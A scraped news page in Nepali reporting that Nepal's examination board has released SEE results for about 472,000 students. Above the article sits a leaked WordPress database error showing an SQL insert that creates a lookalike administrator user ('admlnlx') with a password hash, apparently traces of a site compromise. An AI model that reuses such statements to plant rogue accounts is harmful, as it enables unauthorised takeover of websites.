WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BoRvA9xNNJnsGEUM421mqXgQW47VWo/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-02 12:10:40', '', 'admlnlx', 'admlnlx')
काठमाण्डौ । राष्ट्रिय परीक्षा बोर्डले माध्यमिक शिक्षा परीक्षा एसईईको नतिजा सार्वजनिक गरेको छ । ४ लाख ७२ हजार ७८ जना एसईई परीक्षार्थीको नतिजा बोर्डले सोमबार सार्वजनिक गरेको हो ।
एसईई परीक्षाका लागि ४ लाख ८२ हजार परीक्षार्थीहरुले आवेदन फारम भरेका थिए । करिब १० हजार जनाको परीक्षा विभिन्न कारणले रद्द भएको बोर्ड अन्तर्गत परीक्षा नियन्त्रण कार्यालय कक्षा १० का परीक्षा नियन्त्रक रामराज खकुरेलले जानकारी दिए ।
उनले भने,’ विद्यालयले पठाएको नतिजा प्रमाणित गर्ने निर्णय गर्यौं । गत वर्ष जस्तो नतिजा विश्लेषण गरेनौं ।’